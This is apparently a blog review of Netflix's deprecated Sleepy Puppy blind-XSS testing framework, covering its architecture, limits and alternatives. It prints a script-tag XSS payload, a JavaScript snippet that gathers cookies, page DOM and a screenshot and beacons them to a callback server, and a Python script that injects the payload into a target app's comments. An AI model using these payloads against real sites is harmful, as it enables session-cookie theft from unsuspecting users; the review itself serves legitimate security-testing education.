Sleepy Puppy: How Netflix Built a Callback-Based XSS Detection System That Tracked Payloads Across Time and Applications

Hook

When Netflix's security team injected XSS payloads into internal systems, they discovered some wouldn't execute until weeks later—in completely different applications than where they were injected. Traditional testing tools were blind to this problem.

Context

Traditional XSS testing follows a simple pattern: inject a payload, observe immediate execution, document the vulnerability. This works fine for reflected XSS where cause and effect are immediate, but enterprise applications rarely work in isolation. Data flows between systems—user profiles sync across services, comments get imported into admin dashboards, API responses get cached and replayed. An XSS payload injected into Application A might not execute there at all, but could surface days later in Application B's reporting interface, or weeks later when an admin reviews flagged content.

Netflix's security team faced this exact scenario at scale. With hundreds of microservices, data lakes, and internal tools consuming and displaying user-generated content, they needed a way to track where injected payloads actually executed—not just where they were injected. The solution was Sleepy Puppy, an XSS payload management framework built around a central callback server. Instead of relying on visual confirmation of alert boxes, every payload would phone home when executed, reporting its location, execution context, and environmental metadata. This architectural shift—from observation-based testing to callback-based detection—enabled discovery of vulnerabilities that would otherwise remain hidden in the gaps between applications.

Technical Insight

System architecture — auto-generated

Sleepy Puppy's architecture centers on three core components: the Flask management server, injectable payloads with embedded callbacks, and PuppyScripts that customize what data gets collected. The payload injection workflow is elegantly simple. When you create an assessment in Sleepy Puppy, it generates a unique payload containing a script tag that loads JavaScript from the Sleepy Puppy server. Here's what a typical payload looks like:

<script src="https://sleepy-puppy.example.com/capture?id=a3f29c1b"></script>

When this payload executes—whether immediately or months later—the browser makes a request to the Sleepy Puppy server. The server responds with a dynamically generated PuppyScript that collects environmental data and sends it back. A basic PuppyScript implementation might look like this:

(function() {
    var payload_data = {
        url: window.location.href,
        cookies: document.cookie,
        dom: document.documentElement.outerHTML,
        referrer: document.referrer,
        user_agent: navigator.userAgent,
        payload_id: 'a3f29c1b'
    };
    
    // Take a screenshot using HTML5 canvas
    html2canvas(document.body).then(function(canvas) {
        payload_data.screenshot = canvas.toDataURL();
        
        // Send everything back to Sleepy Puppy
        var beacon = new Image();
        beacon.src = 'https://sleepy-puppy.example.com/callback?' + 
                     'data=' + encodeURIComponent(JSON.stringify(payload_data));
    });
})();

The framework stores this capture data in PostgreSQL with foreign key relationships linking payloads to assessments, captures to payloads, and screenshots to captures. This relational model enables powerful queries like "show me all applications where payload X executed" or "find all captures from assessment Y that included admin cookies."

PuppyScripts are customizable templates stored in the database, allowing security teams to tailor data collection to their needs. Want to exfiltrate localStorage contents? Modify the PuppyScript. Need to fingerprint the JavaScript environment to determine if it's a headless browser? Add that logic. This flexibility made Sleepy Puppy adaptable to different testing scenarios without requiring code changes to the core application.

The REST API integration was particularly clever for automated testing. Security engineers could configure Burp Suite or ZAP to request fresh payloads from Sleepy Puppy's /api/payloads endpoint, inject them during automated crawling, then check /api/captures later to see what executed. This workflow looks like:

import requests
import time

# Get a fresh payload from Sleepy Puppy
response = requests.post(
    'https://sleepy-puppy.example.com/api/payloads',
    json={'assessment_id': 42},
    headers={'X-Auth-Token': 'your-token'}
)
payload = response.json()['payload']

# Inject it into your target application
requests.post(
    'https://target-app.example.com/comments',
    data={'comment': payload}
)

# Check later for captures
time.sleep(3600)  # Wait an hour
captures = requests.get(
    'https://sleepy-puppy.example.com/api/captures',
    params={'assessment_id': 42},
    headers={'X-Auth-Token': 'your-token'}
).json()

for capture in captures:
    print(f"Payload executed at: {capture['url']}")
    print(f"Cookies captured: {capture['cookies']}")

The deployment architecture used Docker Compose to orchestrate Flask, PostgreSQL, and Nginx, with optional AWS integrations for S3 screenshot storage and SES email notifications. When a new capture arrived, Sleepy Puppy could automatically email security teams with the URL, screenshot, and DOM snapshot—turning delayed XSS detection into a near-real-time alerting system. This operational model transformed XSS testing from a manual, point-in-time activity into a continuous monitoring process.

Gotcha

The elephant in the room: Sleepy Puppy has been officially deprecated since July 2018. No bug fixes, no security patches, no compatibility updates for modern browsers or frameworks. The codebase uses Flask patterns and JavaScript libraries from the mid-2010s, and while it might still technically function, running unmaintained security tooling is ironic at best, dangerous at worst. Dependencies have known vulnerabilities, and browser changes over the past six years may break screenshot capture or other collection mechanisms.

Beyond deprecation, the callback architecture has inherent limitations. Your Sleepy Puppy server must be publicly accessible for payloads to phone home, which means you're running internet-facing infrastructure that needs hardening. If you're testing applications behind corporate firewalls or in air-gapped environments, callbacks won't work unless you've set up complex proxy arrangements. Additionally, the framework requires non-trivial infrastructure—PostgreSQL, proper DNS, SSL certificates, potentially AWS accounts—which is heavyweight compared to simply using Burp Collaborator or a webhook service. For quick XSS testing, Sleepy Puppy's setup overhead exceeds its value. It was built for Netflix-scale operations where hundreds of engineers were continuously testing dozens of interconnected services, not for penetration testing individual web applications.

Verdict

Use if: You're researching enterprise security tool architecture, studying how Netflix approached security at scale, or building a modern XSS detection system and want to understand the callback-based detection pattern that Sleepy Puppy pioneered. It's valuable as a reference implementation and educational resource for understanding cross-application vulnerability tracking. Skip if: You need an actual production XSS testing tool—the deprecated status makes this a non-starter for real security work. Use XSS Hunter Express for actively maintained callback-based XSS detection, Burp Collaborator if you're already in the Burp ecosystem, or build a lightweight webhook-based solution using serverless functions if you need custom behavior. Sleepy Puppy's time has passed, but its architectural insights remain relevant for anyone building security testing infrastructure.

Sleepy Puppy: How Netflix Built a Callback-Based XSS Detection System That Tracked Payloads Across Time and Applications

Sleepy Puppy: How Netflix Built a Callback-Based XSS Detection System That Tracked Payloads Across Time and Applications

Hook

Context

Technical Insight

Gotcha

Verdict

// KNOWLEDGE GRAPH

// CODEBASE INTELLIGENCE

Best for

Skip when

[ SIMILAR REPOS ]

Sleepy Puppy: How Netflix Built a Callback-Based XSS Detection System That Tracked Payloads Across Time and Applications

Hook

Context

Technical Insight

Gotcha

Verdict

// KNOWLEDGE GRAPH

// RELATED

Caldera: When Your Red Team Needs a Planning Algorithm, Not Just Another C2

Caldera: Building Adversary Emulation with Fact-Based Planning Engines

Inside Mathias Bynens' Dotfiles: The Blueprint for 30,000 macOS Developer Environments

Glow: Why Rendering Markdown in the Terminal Shouldn't Require a Browser

Caldera: When Your Red Team Needs a Planning Algorithm, Not Just Another C2

Caldera: Building Adversary Emulation with Fact-Based Planning Engines

Inside Mathias Bynens' Dotfiles: The Blueprint for 30,000 macOS Developer Environments

// CODEBASE INTELLIGENCE

Best for

Skip when

[ SIMILAR REPOS ]